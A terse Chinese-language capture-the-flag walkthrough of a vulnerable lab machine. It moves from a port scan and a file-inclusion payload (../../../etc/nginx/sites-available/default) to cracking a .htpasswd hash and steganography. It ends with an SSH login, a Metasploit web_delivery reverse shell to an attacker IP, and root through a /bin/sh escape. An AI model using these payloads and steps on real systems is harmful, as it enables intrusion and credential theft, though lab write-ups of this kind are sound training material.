端口扫描
80,1337,12320,12321,12322....
多个端口运行在http
没啥东西
在nmap扫描时12322有爆出目录/robots.txt看看
file_view.php访问后是空白页面
fuzz一下参数(上一章节有),是file
试试文件包含
获得两个用户n30和Neo
是ngnix的服务读取敏感文件看看
file = ../../../../../etc/nginx/sites-available/default
这里面可以看到密码储存在 **/var/www/p4ss/.htpasswd
查看一下它得到**Tr1n17y 的用户的密码哈希值,用john破解
用户名:Tr1n17y 密码:admin
登入上面的页面
查看页面源码
查看一下源码
有个隐藏图片
看一下
用 steghide ”的工具来查找图像中是否隐藏有任何文件
用它登入12320端口ssh
use exploit/multi/script/web_delivery
set lhost 192.168.1.107
set srvhost 192.168.1.107
exploit
创建一个python漏洞脚本,反弹到msf上
ls -lhai
阅读一下bash_history
morpheus 'BEGIN {system("/bin/sh")}' ```sh and got the root flag..
morpheus 'BEGIN {system("/bin/sh")}执行试试,成功提权root